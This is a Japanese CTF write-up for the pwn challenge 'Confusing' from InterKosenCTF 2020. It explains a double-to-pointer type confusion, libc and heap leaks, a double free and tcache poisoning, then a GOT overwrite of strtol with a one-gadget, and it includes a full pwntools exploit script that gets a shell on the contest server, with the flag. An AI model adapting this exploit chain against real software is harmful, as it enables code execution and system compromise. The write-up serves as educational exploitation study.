--- tags: pwn, ctf --- # InterKosenCTF 2020 - Confusing * 作問者Writeup(問題リポジトリに同梱): <https://github.com/theoremoon/InterKosenCTF2020-challenges/blob/master/pwn/confusing/solution/solve.py> * 作問者感想兼軽い解説: <https://ptr-yudai.hatenablog.com/entry/2020/09/07/020405#confusing> * これまでに解いた問題: <https://hackmd.io/@Xornet/BkemeSAhU> ## Writeup ### Outline 型(int, double, string(pointer))と値を指定して保存できる問題。intとpointerはそれぞれ32bit, 48bitあれば十分なので残り16bitがマジックナンバーとして使われ、型情報が保存されている。しかし、doubleはそれが無いので型の偽装が可能。 PIE無効なのでstringに上手く偽装したdoubleをリストで開示するとAARが出来る。 これでlibcとheapのアドレスをリークする(前者はGOTから、後者は.bssセクションにある値リストから)。 heap上にある既知のチャンクのアドレスが分かっているので同じくstringに偽装した2つの値が同じdoubleをリストに配置し、deleteすることでDouble Freeに持ち込むことが出来る。これで任意の値の書き込みが可能になったのでなんとかしてシェルを起動する。 実はこちらからの入力を与える際にstring型の中身を与えるところ以外ではチャンクの確保と`free`が発火するため`__free_hook`を直接書き換えようとすると嬉しくない値(選択肢の1(バイトにすると`b"\x31\x0a"`)等)が入りセグフォで死ぬ。そこで今回はPartial RELROなのでGOT Overwriteで`strtol`のGOTをone gadgetに書き換えて祈った。 ### checksec ``` Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) FORTIFY: Enabled ``` ### Binary * libc: 2.27 * 保持可能ポインタ: 10 * malloc可能サイズ: ? (最初は0x80で、クソ長い文字列を与えると増えたりする???) * コマンド 1. set value: 型とインデックスと値を指定してリストに保存する 2. show list: リスト中の値を全部開示する 3. delete value: インデックスを指定して値を削除する この問題の最大厄介ポイントがこのコマンド選択も含めあらゆる箇所で使われている`get_string`関数と`get_integer`関数である。 ```c= char *get_string(const char *msg) { char *ptr, *nlpos; size_t n = 0; printf("%s", msg); if (getline(&ptr, &n, stdin) == -1) { free(ptr); exit(0); } if (nlpos = strchr(ptr, '\n')) { *nlpos = '\0'; } return ptr; } int get_integer(const char *msg) { char *p = get_string(msg); int v = atoi(p); free(p); return v; } ``` ありとあらゆる入力に`get_string`が使われ、その度に内部で呼ばれている`getline`がHeap領域から勝手にチャンクを確保したりする。 そして`get_integer`関数も同様でこいつは呼ばれる度に使ったポインタを`free`する。 そういうわけでHeap問の定番である`__free_hook`書き換えを普通に行おうとすると「`__free_hook`書き換えのためのコマンド選択」の地点で`__free_hook`の確保(+書き込み)と`free`が発生する。一般的にコマンド選択は1,2,3のいずれかであるため`0x31, 0x32, 0x33`と改行コードが`__free_hook`に入り、その後の`get_integer`で`free`が呼ばれて関数ポインタとして不適なこいつらを呼ぼうとして死ぬ。 それならこのコマンド選択で選択肢としては不適だが、入れたいバイト列を送れば良いと考えるかもしれない(実際考えた)。 しかし、そんなことは想定済みなのか1, 2, 3以外の選択肢を受け取ると`return`し、ここはmain関数の処理なのでプログラムが終了する。 但し、それ以外のインデックスや型指定はmainに戻るだけなので選択肢部分だけ回避すれば良い(作問者Writeupはそれをしているように見える)。 じゃあ`__free_hook`を先頭におかないようにすれば良い、となるが`free`のせいでだいたいtcacheの先頭にこのクッション用のチャンクが返ってきてしまい、今度は一生`__free_hook`が書き換えられなくなる というわけでこの回避策を考えるのが後半戦になるが長くなるのでひとまずType Confusionの説明をする。 ### Type Confusion 今回保存される値は次のような構造になっている(配布ソースコードまんま) ```c= /* * Do you know how WebKit keeps variables in memory? * * > The top 16-bits denote the type of the encoded JSValue: * > * > Pointer { 0000:PPPP:PPPP:PPPP * > / 0001:****:****:**** * > Double { ... * > \ FFFE:****:****:**** * > Integer { FFFF:0000:IIII:IIII * * How smart it is! I implemented this structure in C :) * I hope I made it right...... * * Read the following code for more information: * - https://github.com/adobe/webkit/blob/master/Source/JavaScriptCore/runtime/JSValue.h */ #define VALUE_UNDEFINED ((void*)0x0a) #define MAGIC_STRING 0x0000 #define MAGIC_INTEGER 0xFFFF /* A magic type that can keep string, double and integer! */ typedef union __attribute__((packed)) { char *String; double Double; int Integer; struct __attribute__((packed)) { unsigned long data : 48; unsigned short magic: 16; } data; } Value; void Value_SetUndefined(Value *v) { v->String = VALUE_UNDEFINED; } void Value_SetString(Value *v, char *p) { v->String = p; } void Value_SetDouble(Value *v, double d) { v->Double = d; } void Value_SetInteger(Value *v, int i) { v->Integer = i; v->data.magic = MAGIC_INTEGER; } int Value_IsUndefined(Value v) { return v.String == VALUE_UNDEFINED; } int Value_IsString(Value v) { return (v.data.magic == MAGIC_STRING) && (!Value_IsUndefined(v)); } int Value_IsInteger(Value v) { return v.data.magic == MAGIC_INTEGER; } int Value_IsDouble(Value v) { return !(Value_IsUndefined(v) || Value_IsString(v) || Value_IsInteger(v)); } ``` 共用体を利用してString, Double, Integerの型のどれが来ても値と方が保存出来るようになっている。 StringとInteger(とUndefined)はマジックナンバーで特定しており、そうでないものがDouble型となる。 ということはこのマジックナンバー部分を含むようなDouble型を与えるとDouble型として送ったにも関わらずString型として扱うことが出来る。 [ここのサイト](https://gregstoll.dyndns.org/~gregstoll/floattohex/)で適当な16進値(0xdeadbeef等)を与えてみると該当するdouble型の数値が得られる。 この問題ではString型の実体はポインタでshow機能でその指す先を見ることが出来た。ということはDoubleとして送り、Stringとみなされた数値がアドレスとして有効ならそこを覗く事が出来る。これを利用してlibcとHeapのアドレスはリーク出来る。 前者はGOTを覗けば良く(PIE無効なのでGOTのアドレスは分かっている)、後者は.bssセクションで管理されている値のリストでString型(Heap領域上のポインタ)が置かれている場所を覗けば良い。 ### Double Free Type Confusionのおかげで出来るのはAARだけでは無い。Double型を通じて、任意のアドレスをString型(ポインタ)としてリストにおけるようになるので実質任意アドレスのfreeが出来る。 これは`delete`関数で行われており次のようになっている。 ```c= void delete(void) { unsigned int index, type; index = get_integer("index: "); if (index >= NUM_ELEMENT) { puts("Wrong index :("); return; } if (Value_IsString(list[index])) free(list[index].String); Value_SetUndefined(&list[index]); puts("[+] Successfully deleted value"); } ``` ここで`Value_SetUndefined`が有るため、同じインデックスを2度deleteで指定してDouble Freeという事はおそらく出来ない。しかし違うインデックスで同じアドレスを指すポインタを用意しておけばどちらもdeleteすることでDouble Freeが出来る。 今回は事前にString型として仕込んだポインタが指す先を調べておき、そこと同じ値になるようなDouble型を計算して型を偽装した。 これでtcache poisoningが出来るのでサイズ0x80のtcacheの先頭に書き込みたいアドレスが来るようにする。 但し、前述したように`__free_hook`を直接書き換えるのは`get_integer`中の`free`が走って終わるのでちょっと上を`"/bin/sh\x00"`に書き換えるついでにその下にある`__free_hook`にsystem関数のアドレスを同時に入れる等の工夫が居る。 一方私は、運に任せてPartial RELROであることを利用して`get_integer`中で呼ばれている`atoi`(実際は`strtol`)のGOTをOne Gadgetで書き換える事にした。 無事に刺さって良かったです。 ## Code ```python= import struct import binascii from pwn import p64, u64, ELF, process, remote from xlog import XLog logger = XLog("EXPLOIT") # you need filling this variables PROMPT_CHAR = "> " CREATE_NUM = 1 EDIT_NUM = None DELETE_NUM = 3 SHOW_NUM = 2 def select(s, sel, c=PROMPT_CHAR): if sel is None or c is None: logger.warning("please fill above variables") exit(-1) s.recvuntil(c) s.sendline(str(sel)) # heap commands def create(s, i, _type, data): select(s, CREATE_NUM) s.recvuntil("index: ") s.sendline(str(i)) s.recvuntil("type (1=String / 2=Double / 3=Integer): ") s.sendline(str(_type)) s.recvuntil("data: ") s.sendline(data) def delete(s, i): select(s, DELETE_NUM) s.recvuntil("index: ") s.sendline(str(i)) def show(s, i): select(s, SHOW_NUM) s.recvuntil(f"{i}: [") _type = s.recvuntil("]")[:-1] s.recvuntil(' "') res = s.recvline()[:-2] return res def hex_to_double(n): s = hex(n)[2:] s = s.rjust(16, "0") return str(struct.unpack('>d', binascii.unhexlify(s))[0]) if __name__ == "__main__": elf = ELF("chall") # libc = ELF("/lib/x86_64-linux-gnu/libc-2.27.so") libc = ELF("libc-2.27.so") free_hook_libc = libc.symbols["__free_hook"] malloc_hook_libc = libc.symbols["__malloc_hook"] system_libc = libc.symbols["system"] setbuf_got = elf.got["setbuf"] # 0x602030 atoi_got = elf.got["strtol"] # onegadgets = [0x4f2c5, 0x4f322, 0x10a38c] onegadgets = [0x4f365, 0x4f3c2, 0x10a45c] # s = process(elf.path) s = remote("pwn.kosenctf.com", 9005) # libc leak """ from: https://gregstoll.dyndns.org/~gregstoll/floattohex/ """ setbuf_got_double = "3.1124634e-317" create(s, 0, 2, setbuf_got_double) libc_addr = u64(show(s, 0).ljust(8, b"\x00")) - libc.symbols["setbuf"] logger.libc(libc_addr) # heap leak string_p_double = "3.1125227e-317" create(s, 1, 1, "/bin/sh") create(s, 2, 2, string_p_double) heap_addr = u64(show(s, 2).ljust(8, b"\x00")) - 0x260 logger.heap(heap_addr) # tcache poisoning target_addr = heap_addr + 0x260 free_hook_addr = libc_addr + free_hook_libc system_addr = libc_addr + system_libc create(s, 3, 2, hex_to_double(target_addr)) delete(s, 1) delete(s, 3) create(s, 4, 1, p64(atoi_got)) create(s, 5, 1, "unko") s.recvuntil(b"> ") s.sendline(p64(libc_addr + onegadgets[2])) s.interactive() ``` ## Flag 当日はチームメイトが解きましたが、鯖が動いていたので終了後に自力で解きました `KosenCTF{add_0x2000000000000_to_double_precision_values}` Exploitの実行結果はこちら ``` $ xplt [*] '/mnt/c/share/CTF/interkosen2020/confusing/chall' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) FORTIFY: Enabled [*] '/mnt/c/share/CTF/interkosen2020/confusing/libc-2.27.so' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled [+] Opening connection to pwn.kosenctf.com on port 9005: Done [EXPLOIT][+]: libc address -> 0x7f47db17d000 [EXPLOIT][+]: heap address -> 0x17ad000 [*] Switching to interactive mode $ ls chall flag-1bdc5727ec49424f60f9e73ade834db6.txt redir.sh $ cat flag-1bdc5727ec49424f60f9e73ade834db6.txt KosenCTF{add_0x2000000000000_to_double_precision_values} ``` ## 感想 Type Confusion要素はめちゃくちゃ面白かったです。Browser ExploitがType Confusionが多いとの事で挑戦してみたくなりましたし、ユーザーランドのELF問題でもこういう形式が増えて欲しいです。 が、freeの起こるタイミングのコントロールが難しくHeapパートは大変でした。 C++問題でも`string`型のせいでHeap領域を掻き乱されたり等、この手の裏で行われているmallocにはいい思い出があまり無いですが、問題に触れるのを繰り返してこういうのに慣れていけたら嬉しいです。 解き終わった後に当日解いたチームメイトに聞いたら`__free_hook`の手前から書き込んで`free`するポインタは`"/bin/sh"`を指すようにし、同時に`__free_hook`に`system`のアドレスを入れて落ちる事を回避していたらしい、天才か? 作問者Writeupはサイズの偽装を行ってうまい具合に`__free_hook`に嫌な値が入るのを防いでいました、天才か?
Last changed by  
Xornet
* 勉強メモ置き場 * 日記置き場
766

Read more

n日1CTFチャレンジ

こちらから全ての記事をMarkdown形式で入手出来ます 現在、このページは更新(Writeup追加, 編集, 誤字修正等)を停止しています 類似のプロジェクトをこちらで行っています、よければ見てください Rules n日に1問以上のpwnを解くかPwnに関する有益な学習をする、できればn=1を目指す -> pwnからCTF全般に変わりました 解いた場合はWriteupの執筆、学習の場合はそれに関する記事を生成することで達成したとみなす、クオリティは本人が納得出来る程度で(コードを貼って終わりのWriteupにはしたくないです) 継続期間の平均を取るので同じ日に2問以上解いた場合は翌日以降の分は実質免除される

5/31/2022
ASIS CTF Quals 2020 - babynote

これまでに解いた問題: https://hackmd.io/@Xornet/BkemeSAhU 作問者リポジトリ https://bitbucket.org/ptr-yudai/writeups-2020/src/master/ASIS_CTF_Quals_2020/ Writeup Outline いつものHeap問題...と思いきやHeap上に処理を移してROPする問題、とは言えadd(create+edit), delete, showは普通に出来る 最初に指定した分だけポインタが入る動的配列(おそらくallocaを利用)をスタック上に用意してHeap領域を指すポインタを用意している。 この際、指定した容量だけrspが上(アドレス的には小さい方)に伸びるのだが、ここで負数を指定するとrspが下がる。これはshort型で渡すので65535を指定すれば-1を指定したのと同じになる。

12/31/2020
ゼロ知識証明完全に理解(し|できなかっ)た

あゔすと!! 自分がとある秘密(例えば難しい問題の解)を知っているとする。これを他者に知らせたい場合はどうすればよいだろうか?当然"ぼく答え知ってりゅ~"と吹聴するのは駄目な訳で、しっかりした形で答えを知っていることを"証明"しなくてはならない。 手っ取り早いのはその答えを相手に伝えて検証してもらうことだが、相手に答えを知らせずに答えを持っていることを証明したいケースが存在する。このように相手に秘密情報を与えずにそれを保持していることを示すことをゼロ知識証明という。 用語 証明者(Prover): その問題の答えを知っていることを示す側 検証者(Verifier): 証明者が答えを知っていることを検証する側 以下はゼロ知識証明のプロトコルの際に必要な3要件である。

12/16/2020
格子を利用した(擬)NTRU暗号の解読: 巅峰极客·网络安全技能挑战赛 - NTURE

お断り タイトルにある通り格子を利用したNTRU"っぽい"ものの解読をします、NTRU暗号自体の解読はありません、NTRUは年内に出来たらやりたいです 扱うCTFなんですが、中国のCTFである事から正式名称がよくわかりませんでした。ひとまず会場跡地っぽいサイトから拾って翻訳をかけてタイトルに付けましたが誤っている可能性があります(問題名はおそらく合ってます) Writeupで扱う格子の知識は掻い摘んで説明しますが記法が複雑で書くのが面倒くさい解読の本質から逸れる部分があるので格子関連の用語の定義とかは各自ググってほしいです 格子の基底簡約(縮小)を行うアルゴリズムが出てきますがなぜそれが有効なのかの説明はしません(証明が面倒くさい) Writeup outline NTRU暗号っぽいが多項式では無くただの整数が使われている暗号が与えられる。秘密鍵f,g を並べたベクトルは、公開鍵h, pと0, 1から構成されるベクトル(1, h)と(0, q)を基底に持つ2次元格子行列上の格子点になる上、これら2つの基底に比べてかなり小さいことが期待されるのでこの格子をGauss(Lagrange)の基底簡約アルゴリズムで簡約すると、その内の短い方が秘密鍵となるので後は復号するだけ

10/3/2020
Read more from Xornet
Published on HackMD